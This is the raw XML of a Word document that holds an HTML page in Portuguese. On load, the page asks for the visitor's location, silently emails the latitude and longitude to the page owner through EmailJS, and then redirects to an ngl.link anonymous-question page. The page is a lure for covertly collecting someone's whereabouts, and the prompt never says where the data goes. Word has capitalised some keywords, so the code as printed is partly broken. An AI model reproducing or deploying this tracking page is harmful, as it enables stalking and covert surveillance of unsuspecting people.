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296F4" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6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165D3B9" w14:textId="71D815FE" w:rsidR="006961B6" w:rsidRDefault="006961B6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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A784C2E" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140F50BD" w14:textId="66EC61AC" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">&lt;meta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=”UTF-8”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9915D6" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;Permissão de Localização&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE78EE7" w14:textId="167491CE" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;script src=</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="003336B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cdn.jsdelivr.net/npm/emailjs-com@2.6.4/dist/email.min.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47621DCB" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DC17A" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029418CD" w14:textId="3708C8F1" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Emailjs.init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“SUA_PUBLIC_KEY_AQUI”); // MWeJIT56-pVwblBmI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06881BC9" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">  })();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EA10D" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6"/>
    <w:p w14:paraId="16952E96" w14:textId="27900E5C" w:rsidR="006961B6" w:rsidRDefault="006961B6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pedirLocalizacao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7428EB88" w14:textId="65AEA6EF" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">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confirm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“O site requer permissão à sua localização”)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0C5B4" w14:textId="580E88CA" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Navigator.geolocation.getCurrentPosition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D69A0" w14:textId="355B70B1" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99F3CB" w14:textId="4582D91D" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          Var latitude = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>position.coords.latitude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A9654" w14:textId="141C2F83" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          Var longitude = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>position.coords.longitude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5D759" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6"/>
    <w:p w14:paraId="62B3726F" w14:textId="27C927B9" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Emailjs.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“SEU_SERVICE_ID”, “SEU_TEMPLATE_ID”, { // MWeJIT56-pVwblBmI e MWeJIT56-pVwblBmI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939E4F8" w14:textId="5484191C" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              Latitude: latitude,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11ACFF" w14:textId="041320A9" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              Longitude: longitude</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26A79A" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          }).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>then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14:paraId="07F8872E" w14:textId="2E63BBF8" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Console.log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“Localização enviada com sucesso”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466A715" w14:textId="35C8E884" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Window.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003336B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ngl.link/selmara68245</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124B362" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          }, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08029FE1" w14:textId="7EF29824" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“Erro ao enviar:”, error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC3614" w14:textId="73A1AB7E" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Window.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003336B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ngl.link/selmara68245</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A739813" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9DDF93" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6696FFF6" w14:textId="6BB4647B" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6806B" w14:textId="6C4EEB12" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“Não foi possível obter a localização.”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD972F9" w14:textId="78685049" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Window.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003336B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ngl.link/selmara68245</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C75B9" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DD2E0C" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">      );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C5528" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6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729BAE5A" w14:textId="439D9999" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Window.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003336B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ngl.link/selmara68245</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597CB631" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20666D9D" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1487E486" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C569CE8" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE3AE8" w14:textId="1BCF5496" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t xml:space="preserve">&lt;body </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pedirLocalizacao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6D330" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D0AA68" w14:textId="77777777" w:rsidR="006961B6" w:rsidRDefault="006961B6">
      <w:r>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7708E" w14:textId="4003CEFC" w:rsidR="00980832" w:rsidRDefault="00980832"/>
    <w:sectPr w:rsidR="009808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32"/>
    <w:rsid w:val="006961B6"/>
    <w:rsid w:val="006E5207"/>
    <w:rsid w:val="0098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423D43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5409FDB-DDD5-2347-8246-3DE4680FA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8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61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1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gl.link/selmara68245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ngl.link/selmara68245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ngl.link/selmara68245" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ngl.link/selmara68245" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn.jsdelivr.net/npm/emailjs-com@2.6.4/dist/email.min.js" TargetMode="Externa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Vicente</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Teresa Vicente</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-11T01:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-11T01:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>